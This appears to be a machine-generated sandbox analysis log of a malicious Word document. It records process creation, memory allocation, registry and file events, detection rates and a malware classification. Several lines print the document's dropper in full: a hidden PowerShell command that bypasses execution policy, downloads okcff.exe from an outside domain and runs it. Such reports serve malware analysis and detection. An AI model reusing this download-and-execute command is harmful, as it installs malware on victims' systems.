                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76E90000 page execute and read and write
                    Source: 478644.docVirustotal: Detection: 41%
                    Source: 478644.docReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Roaming\okcff.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............................................`I.........v.....................K......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................bGk......................W.............}..v............0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................eGk......p...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................bGk......................W.............}..v....H.......0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v....X.......0.................p.....$.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................bGk......................W.............}..v............0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................eGk......p...............W.............}..v....X.......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................bGk......................W.............}..v............0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................eGk......p...............W.............}..v....X.......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................bGk......................W.............}..v............0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0.................p.....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................bGk......................W.............}..v............0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................eGk......p...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................bGk......................W.............}..v............0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.... .......0.................p.....&.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................bGk......................W.............}..v....X.......0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................eGk......................W.............}..v.... !......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................bGk.....!................W.............}..v....X"......0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................p.....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................bGk....P'................W.............}..v.....'......0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........eGk......p...............W.............}..v....`+......0.................p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................bGk.....,................W.............}..v.....,......0...............(.p.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.......................p.......................`I.........v.....................K......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............}.jk......................W.............}..v............0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...P.......0...............H!].....6.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............}.jk......................W.............}..v............0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0...............H!].....".......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............}.jk....P.................W.............}..v............0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................jk.....$]...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............}.jk....P.................W.............}..v............0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................jk.....$]...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............}.jk....P.................W.............}..v............0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0...............H!].....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............}.jk......................W.............}..v....H.......0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................jk.....$]...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............}.jk......................W.............}..v....@.......0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w.................jk.....$]...............W.............}..v....x.......0.......................f.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............}.jk....0.................W.............}..v............0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........jk.....$]...............W.............}..v....@.......0...............H!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................}.jk......................W.............}..v....x.......0................!].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....................mljk.... .]...............W.............}..v....pF......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....(G................W.............}..v.....G......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v....8N......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....N................W.............}..v....pO......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v.....S......0.................].....$.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....8T................W.............}..v.....T......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v.....[......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....8\................W.............}..v.....\......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v.....c......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....8d................W.............}..v.....d......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0.................].....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....i................W.............}..v....0j......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v.....p......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....q................W.............}..v....0r......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....Hv......0.................].....&.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....w................W.............}..v.....w......0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v....H~......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk......................W.............}..v............0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................].....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....x.................W.............}..v............0...............x.].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......mljk.... .]...............W.............}..v............0.................].............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....@.................W.............}..v............0...............x.].............................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.....p...............................................................................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.............,.......T.......Y.......................e. .......................................Zs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............,.......T...............................e. .......................................Zs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............,.......T...............................e. .............................H.........Zs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................... .............W.a.i.t.i.n.g. .f.o.r. .2.....0.......h.......................0...............................................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................0...............................e. .......................................Qs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................0...............................e. .......................................Qs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................0.......2.......................e. .............................8.........Qs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................`. ...........W.a.i.t.i.n.g. .f.o.r. .2.....................................0.................&....................... .....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J................. .....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P..... .......................b.......................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P..... .......................L.......................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P..... ...............................................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ......................#...........W.a.i.t.i.n.g. .f.o.r. .2.....8...............................................8.).......................#.....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............8.).....J.................#.....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.............X.......8...............................e. .............8.).......................bs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............X.......................................e. .............8.).......................bs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............X.......8...............................e. .............8.).............X.........bs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................(.............W.a.i.t.i.n.g. .f.o.r. .2.....x...............................0...............................................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................x.......O.......................e. .......................................Es....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................x.......K.......................e. .......................................Es....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................x...............................e. .......................................Es....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.....................................0.................'.............................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............'.....J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....T.......................;.......................e. ...............'.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....T...............................................e. ...............'.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....T...............................................e. ...............'.............(.........ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ...................... ...........W.a.i.t.i.n.g. .f.o.r. .2.....p...............................0.................&....................... .....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J................. .....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................p...............................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................p...............................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................p.......q.......................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................\.............W.a.i.t.i.n.g. .f.o.r. .2.............T.......................................................................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....x...............................................e. .......................................@s....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.............B.......................0...............(.&.............................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.&.....J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................................................e. .............(.&.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.............h.........ls....
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\System32\verclsid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$478644.docJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF70A.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@53/21@4/1
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\okcff.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
